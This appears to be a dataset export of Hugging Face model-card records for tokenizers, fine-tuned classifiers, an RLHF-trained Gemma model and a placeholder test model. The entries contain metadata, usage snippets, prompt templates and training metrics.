modelId
stringlengths 5
139
| author
stringlengths 2
42
| last_modified
timestamp[us, tz=UTC]date 2020-02-15 11:33:14
2025-09-23 18:28:48
| downloads
int64 0
223M
| likes
int64 0
11.7k
| library_name
stringclasses 573
values | tags
listlengths 1
4.05k
| pipeline_tag
stringclasses 55
values | createdAt
timestamp[us, tz=UTC]date 2022-03-02 23:29:04
2025-09-23 18:28:01
| card
stringlengths 11
1.01M
|
---|---|---|---|---|---|---|---|---|---|
Sai5480/monolingual-tokenizer-native-snd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:18Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"snd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:06Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- snd
- vocab-128000
---
# Monolingual Tokenizer - Sindhi (Vocab 128000)
This is a monolingual tokenizer trained on Sindhi text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-snd-vocab-128000")
```
## Files
- `snd.model`: SentencePiece model file
- `snd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Sindhi (snd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
mcptester0606/MyAwesomeModel-TestRepo
|
mcptester0606
| 2025-09-23T15:40:28Z | 0 | 0 |
transformers
|
[
"transformers",
"pytorch",
"bert",
"feature-extraction",
"license:mit",
"endpoints_compatible",
"region:us"
] |
feature-extraction
| 2025-09-23T15:40:53Z |
---
license: mit
library_name: transformers
---
# MyAwesomeModel
<!-- markdownlint-disable first-line-h1 -->
<!-- markdownlint-disable html -->
<!-- markdownlint-disable no-duplicate-header -->
<div align="center">
<img src="figures/fig1.png" width="60%" alt="MyAwesomeModel" />
</div>
<hr>
<div align="center" style="line-height: 1;">
<a href="LICENSE" style="margin: 2px;">
<img alt="License" src="figures/fig2.png" style="display: inline-block; vertical-align: middle;"/>
</a>
</div>
## 1. Introduction
The MyAwesomeModel has undergone a significant version upgrade. In the latest update, MyAwesomeModel has significantly improved its depth of reasoning and inference capabilities by leveraging increased computational resources and introducing algorithmic optimization mechanisms during post-training. The model has demonstrated outstanding performance across various benchmark evaluations, including mathematics, programming, and general logic. Its overall performance is now approaching that of other leading models.
<p align="center">
<img width="80%" src="figures/fig3.png">
</p>
Compared to the previous version, the upgraded model shows significant improvements in handling complex reasoning tasks. For instance, in the AIME 2025 test, the model’s accuracy has increased from 70% in the previous version to 87.5% in the current version. This advancement stems from enhanced thinking depth during the reasoning process: in the AIME test set, the previous model used an average of 12K tokens per question, whereas the new version averages 23K tokens per question.
Beyond its improved reasoning capabilities, this version also offers a reduced hallucination rate and enhanced support for function calling.
## 2. Evaluation Results
### Comprehensive Benchmark Results
<div align="center">
| | Benchmark | Model1 | Model2 | Model1-v2 | MyAwesomeModel |
|---|---|---|---|---|---|
| **Core Reasoning Tasks** | Math Reasoning | 0.510 | 0.535 | 0.521 | 0.550 |
| | Logical Reasoning | 0.789 | 0.801 | 0.810 | 0.819 |
| | Common Sense | 0.716 | 0.702 | 0.725 | 0.736 |
| **Language Understanding** | Reading Comprehension | 0.671 | 0.685 | 0.690 | 0.700 |
| | Question Answering | 0.582 | 0.599 | 0.601 | 0.607 |
| | Text Classification | 0.803 | 0.811 | 0.820 | 0.828 |
| | Sentiment Analysis | 0.777 | 0.781 | 0.790 | 0.792 |
| **Generation Tasks** | Code Generation | 0.615 | 0.631 | 0.640 | 0.650 |
| | Creative Writing | 0.588 | 0.579 | 0.601 | 0.610 |
| | Dialogue Generation | 0.621 | 0.635 | 0.639 | 0.644 |
| | Summarization | 0.745 | 0.755 | 0.760 | 0.767 |
| **Specialized Capabilities**| Translation | 0.782 | 0.799 | 0.801 | 0.804 |
| | Knowledge Retrieval | 0.651 | 0.668 | 0.670 | 0.676 |
| | Instruction Following | 0.733 | 0.749 | 0.751 | 0.758 |
| | Safety Evaluation | 0.718 | 0.701 | 0.725 | 0.739 |
</div>
### Overall Performance Summary
The MyAwesomeModel demonstrates strong performance across all evaluated benchmark categories, with particularly notable results in reasoning and generation tasks.
## 3. Chat Website & API Platform
We offer a chat interface and API for you to interact with MyAwesomeModel. Please check our official website for more details.
## 4. How to Run Locally
Please refer to our code repository for more information about running MyAwesomeModel locally.
Compared to previous versions, the usage recommendations for MyAwesomeModel have the following changes:
1. System prompt is supported.
2. It is not required to add special tokens at the beginning of the output to force the model into a specific thinking pattern.
The model architecture of MyAwesomeModel-Small is identical to its base model, but it shares the same tokenizer configuration as the main MyAwesomeModel. This model can be run in the same manner as its base model.
### System Prompt
We recommend using the following system prompt with a specific date.
```
You are MyAwesomeModel, a helpful AI assistant.
Today is {current date}.
```
For example,
```
You are MyAwesomeModel, a helpful AI assistant.
Today is May 28, 2025, Monday.
```
### Temperature
We recommend setting the temperature parameter $T_{model}$ to 0.6.
### Prompts for File Uploading and Web Search
For file uploading, please follow the template to create prompts, where {file_name}, {file_content} and {question} are arguments.
```
file_template = \
"""[file name]: {file_name}
[file content begin]
{file_content}
[file content end]
{question}"""
```
For web search enhanced generation, we recommend the following prompt template where {search_results}, {cur_date}, and {question} are arguments.
```
search_answer_en_template = \
'''# The following contents are the search results related to the user's message:
{search_results}
In the search results I provide to you, each result is formatted as [webpage X begin]...[webpage X end], where X represents the numerical index of each article. Please cite the context at the end of the relevant sentence when appropriate. Use the citation format [citation:X] in the corresponding part of your answer. If a sentence is derived from multiple contexts, list all relevant citation numbers, such as [citation:3][citation:5]. Be sure not to cluster all citations at the end; instead, include them in the corresponding parts of the answer.
When responding, please keep the following points in mind:
- Today is {cur_date}.
- Not all content in the search results is closely related to the user's question. You need to evaluate and filter the search results based on the question.
- For listing-type questions (e.g., listing all flight information), try to limit the answer to 10 key points and inform the user that they can refer to the search sources for complete information. Prioritize providing the most complete and relevant items in the list. Avoid mentioning content not provided in the search results unless necessary.
- For creative tasks (e.g., writing an essay), ensure that references are cited within the body of the text, such as [citation:3][citation:5], rather than only at the end of the text. You need to interpret and summarize the user's requirements, choose an appropriate format, fully utilize the search results, extract key information, and generate an answer that is insightful, creative, and professional. Extend the length of your response as much as possible, addressing each point in detail and from multiple perspectives, ensuring the content is rich and thorough.
- If the response is lengthy, structure it well and summarize it in paragraphs. If a point-by-point format is needed, try to limit it to 5 points and merge related content.
- For objective Q&A, if the answer is very brief, you may add one or two related sentences to enrich the content.
- Choose an appropriate and visually appealing format for your response based on the user's requirements and the content of the answer, ensuring strong readability.
- Your answer should synthesize information from multiple relevant webpages and avoid repeatedly citing the same webpage.
- Unless the user requests otherwise, your response should be in the same language as the user's question.
# The user's message is:
{question}'''
```
## 5. License
This code repository is licensed under the [MIT License](LICENSE). The use of MyAwesomeModel models is also subject to the [MIT License](LICENSE). The model series supports commercial use and distillation.
## 6. Contact
If you have any questions, please raise an issue on our GitHub repository or contact us at [email protected].
```
|
ZaneHorrible/hs_adib_banglabert
|
ZaneHorrible
| 2025-09-23T15:40:05Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"electra",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:36:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Alee43/blockassist
|
Alee43
| 2025-09-23T15:39:53Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"sly eager boar",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-11T18:43:49Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- sly eager boar
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
Sai5480/monolingual-tokenizer-native-asm-vocab-128000
|
Sai5480
| 2025-09-23T15:39:36Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"asm",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:39:23Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- asm
- vocab-128000
---
# Monolingual Tokenizer - Assamese (Vocab 128000)
This is a monolingual tokenizer trained on Assamese text with vocabulary size 128000.
## Usage
```python
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("monolingual-tokenizer-native-asm-vocab-128000")
```
## Files
- `asm.model`: SentencePiece model file
- `asm.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Assamese (asm)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
Best000/eg_a36
|
Best000
| 2025-09-23T15:39:30Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:37:06Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
aamijar/Llama-2-13b-hf-lora-r8-boolq-epochs3
|
aamijar
| 2025-09-23T15:37:42Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:37:39Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
thefirstgoku/23SEP_inter_v32_4
|
thefirstgoku
| 2025-09-23T15:35:16Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:34:37Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
ziadrone/training_output
|
ziadrone
| 2025-09-23T15:35:12Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:shivash/enhanced-hybrid-transformer-768d",
"base_model:finetune:shivash/enhanced-hybrid-transformer-768d",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:34:46Z |
---
library_name: transformers
license: apache-2.0
base_model: shivash/enhanced-hybrid-transformer-768d
tags:
- generated_from_trainer
model-index:
- name: training_output
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# training_output
This model is a fine-tuned version of [shivash/enhanced-hybrid-transformer-768d](https://huggingface.co/shivash/enhanced-hybrid-transformer-768d) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 5.8198
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.0101 | 0.3366 | 250 | 6.9214 |
| 6.4366 | 0.6732 | 500 | 6.4452 |
| 6.1029 | 1.0094 | 750 | 6.1787 |
| 5.8866 | 1.3460 | 1000 | 6.0269 |
| 5.7574 | 1.6826 | 1250 | 5.9218 |
| 5.6024 | 2.0188 | 1500 | 5.8609 |
| 5.4617 | 2.3554 | 1750 | 5.8362 |
| 5.4463 | 2.6920 | 2000 | 5.8198 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
Kuongan/Hal_phobert-large_finetuned
|
Kuongan
| 2025-09-23T15:31:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:vinai/phobert-large",
"base_model:finetune:vinai/phobert-large",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:19:48Z |
---
library_name: transformers
license: mit
base_model: vinai/phobert-large
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: Hal_phobert-large_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Hal_phobert-large_finetuned
This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7847
- Accuracy: 0.7407
- F1 Macro: 0.7417
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 20
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 1.0956 | 1.0 | 88 | 0.7993 | 0.6786 | 0.6786 |
| 0.7654 | 2.0 | 176 | 0.7491 | 0.71 | 0.7089 |
| 0.618 | 3.0 | 264 | 0.7432 | 0.7257 | 0.7287 |
| 0.4807 | 4.0 | 352 | 0.7847 | 0.7407 | 0.7417 |
| 0.3665 | 5.0 | 440 | 0.8301 | 0.7357 | 0.7376 |
| 0.2522 | 6.0 | 528 | 0.8437 | 0.735 | 0.7364 |
| 0.2095 | 7.0 | 616 | 0.9808 | 0.7357 | 0.7362 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
Ayesha490/mistral-7b-qlora-merged-qa
|
Ayesha490
| 2025-09-23T15:31:14Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:31:04Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-8
|
vectorzhou
| 2025-09-23T15:30:07Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:16:27Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/6kinw4fn)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
HaoranMS/DeepSeek-R1-Distill-Qwen-1.5B-dt_alpha0d01_topp0d5-0923
|
HaoranMS
| 2025-09-23T15:26:49Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"conversational",
"dataset:data/open-s1",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:24:17Z |
---
datasets: data/open-s1
library_name: transformers
tags:
- generated_from_trainer
- open-r1
licence: license
---
# Model Card for None
This model is a fine-tuned version of [None](https://huggingface.co/None) on the [data/open-s1](https://huggingface.co/datasets/data/open-s1) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
